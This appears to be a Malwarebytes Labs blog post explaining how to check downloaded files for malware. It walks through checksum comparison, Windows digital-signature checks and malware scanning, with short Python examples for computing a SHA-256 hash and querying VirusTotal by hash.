How do I filter possible malware from downloaded files?

There are some methods you can use to weed
out the bad boys in your download folder:

  • Compare the checksum to the original file
  • Look at the file’s digital signature
  • Run a malware scan

A checksum is a sequence of numbers and
letters used to check data for errors. If you know the checksum of the original
file, you can compare it to the one you have downloaded. Windows,
macOS, and Linux have built-in options
to calculate the checksum of a file.
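
As an illustration, here is a minimal Python sketch that calculates a file’s SHA-256 checksum and compares it against a published value. The file path and expected checksum are supplied on the command line; built-in tools such as certutil on Windows or shasum/sha256sum on macOS and Linux can do the same job.

    import hashlib
    import sys

    def sha256_of(path):
        """Compute the SHA-256 checksum of a file, reading it in chunks."""
        digest = hashlib.sha256()
        with open(path, "rb") as handle:
            for chunk in iter(lambda: handle.read(1024 * 1024), b""):
                digest.update(chunk)
        return digest.hexdigest()

    if __name__ == "__main__":
        # Usage: python verify_checksum.py <downloaded file> <published checksum>
        downloaded_file, published_checksum = sys.argv[1], sys.argv[2]
        actual = sha256_of(downloaded_file)
        if actual == published_checksum.lower():
            print("Checksum matches the published value.")
        else:
            print(f"MISMATCH: expected {published_checksum}, got {actual}")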

The digital signature of a Windows
executable file (a file with an .exe extension) can be verified after the file
has been downloaded and saved. In your Downloads folder, right-click the
downloaded .exe file and click Properties. Here you can click on the Digital
Signatures tab to check whether the downloaded file is signed by the expected
party.

Finally, use your anti-malware scanner to double-check that you are not downloading an infected file. You can also use online scanners like VirusTotal, which will also provide you with a SHA-256 hash for the file and save you the trouble of calculating a checksum.
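
For those who want to automate this step, VirusTotal also exposes a web API that can be queried by file hash. The sketch below is a minimal example against what is, at the time of writing, the v3 files endpoint; the API key is a placeholder you would obtain by registering for a free account, and only the summary detection statistics are printed.

    import sys
    import requests  # third-party library: pip install requests

    API_KEY = "YOUR_VIRUSTOTAL_API_KEY"  # placeholder: register with VirusTotal to get a key

    def lookup_hash(file_hash):
        """Query VirusTotal's v3 API for an existing report on a file hash."""
        url = f"https://www.virustotal.com/api/v3/files/{file_hash}"
        response = requests.get(url, headers={"x-apikey": API_KEY}, timeout=10)
        if response.status_code == 404:
            print("No report found for this hash.")
            return
        response.raise_for_status()
        stats = response.json()["data"]["attributes"]["last_analysis_stats"]
        print(f"Detections: {stats.get('malicious', 0)} malicious, "
              f"{stats.get('suspicious', 0)} suspicious, "
              f"{stats.get('undetected', 0)} undetected")

    if __name__ == "__main__":
        lookup_hash(sys.argv[1])  # pass the SHA-256 (or MD5) hash of the file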

[Image: VirusTotal scan results]

Much ado about what?

All this may seem like a lot of work to those who habitually download files without a worry in the world. However, even the most practiced downloader eventually has their moment of truth—when that downloaded file wrecks their computer or all those bundled applications are harder to remove than expected.

People who download all the time develop better instincts about which sites to trust, but that doesn’t mean they can’t be fooled. From experience, they can tell the sites that offer malware under a convincing filename from the sites that offer clean files. But sometimes, we reach for the shiny golden delicious and, once we take a bite, discover it has a worm.

We don’t all have the stomach or the knowledge to clean an infected computer. And some systems are not ours to put at risk.

Even if you follow all these pointers to the letter, it is still riskier to download files from unknown sites than it is to download from the company that made them. So we would like to urge companies to keep their “old files” available on their own site, even if the number of downloads has dwindled.

Stay safe, everyone!

The post Dubious downloads: How to check if a website and its files are malicious appeared first on Malwarebytes Labs.